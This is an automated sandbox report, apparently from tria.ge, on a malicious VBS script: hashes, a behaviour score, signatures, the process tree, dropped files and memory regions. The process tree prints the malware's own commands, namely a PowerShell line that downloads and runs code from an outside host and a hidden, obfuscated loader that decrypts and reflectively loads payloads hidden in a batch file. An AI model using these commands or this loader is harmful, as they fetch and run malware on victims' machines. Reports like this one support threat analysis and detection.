Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    09/12/2024, 17:28

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1980
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1932
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1256
    • C:\Windows\System32\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1824

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\c.bat

    Filesize

    1.6MB

    MD5

    63a0d558702bb4b4fdad3fbe2ffc0ac9

    SHA1

    c70f2444e8052e6495c42f179785da267acac50b

    SHA256

    c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

    SHA512

    7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    3e1eefd04a30f99176dda02c61cad12a

    SHA1

    4af7b314f64569d47aef48924b6f4d6cb332a656

    SHA256

    d9a0df80551338b49dfb5d0ec16db0dcaac68f80e81f5db17777ae643a4eb3e8

    SHA512

    2eea974192ed27f918db033ab704233ec094f2d94b6633a1663aecfad0045d752145194280bd318fa2cfda157eacbc272eea3e41b85feaef57066abd40a27f61

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\UP5INLH8OZG4ZOAPQMTI.temp

    Filesize

    7KB

    MD5

    673fdbcaebd183256af7a23aa2752664

    SHA1

    dca10dd769cc88081b40113352782c2348644ea3

    SHA256

    1c53589477bbff7de9d1d27159aa2261a20474938b34f9fd9f33a03f8c974fed

    SHA512

    3b6f737135994918ad8711d0fd0f0e95c8d5c4de6dfa3e6a4e56b51f9bb502d43db6e983b5eeeb8351c68540a3381fc8b6c5f2cd416e6b014183aebeb27fb08e

  • memory/1256-4-0x000007FEF5F8E000-0x000007FEF5F8F000-memory.dmp

    Filesize

    4KB

  • memory/1256-5-0x000000001B6E0000-0x000000001B9C2000-memory.dmp

    Filesize

    2.9MB

  • memory/1256-6-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

    Filesize

    9.6MB

  • memory/1256-7-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

    Filesize

    9.6MB

  • memory/1256-8-0x0000000001E20000-0x0000000001E28000-memory.dmp

    Filesize

    32KB

  • memory/1256-9-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

    Filesize

    9.6MB

  • memory/1256-10-0x000007FEF5CD0000-0x000007FEF666D000-memory.dmp

    Filesize

    9.6MB

  • memory/1824-25-0x000000001B4E0000-0x000000001B7C2000-memory.dmp

    Filesize

    2.9MB

  • memory/1824-26-0x0000000002340000-0x0000000002348000-memory.dmp

    Filesize

    32KB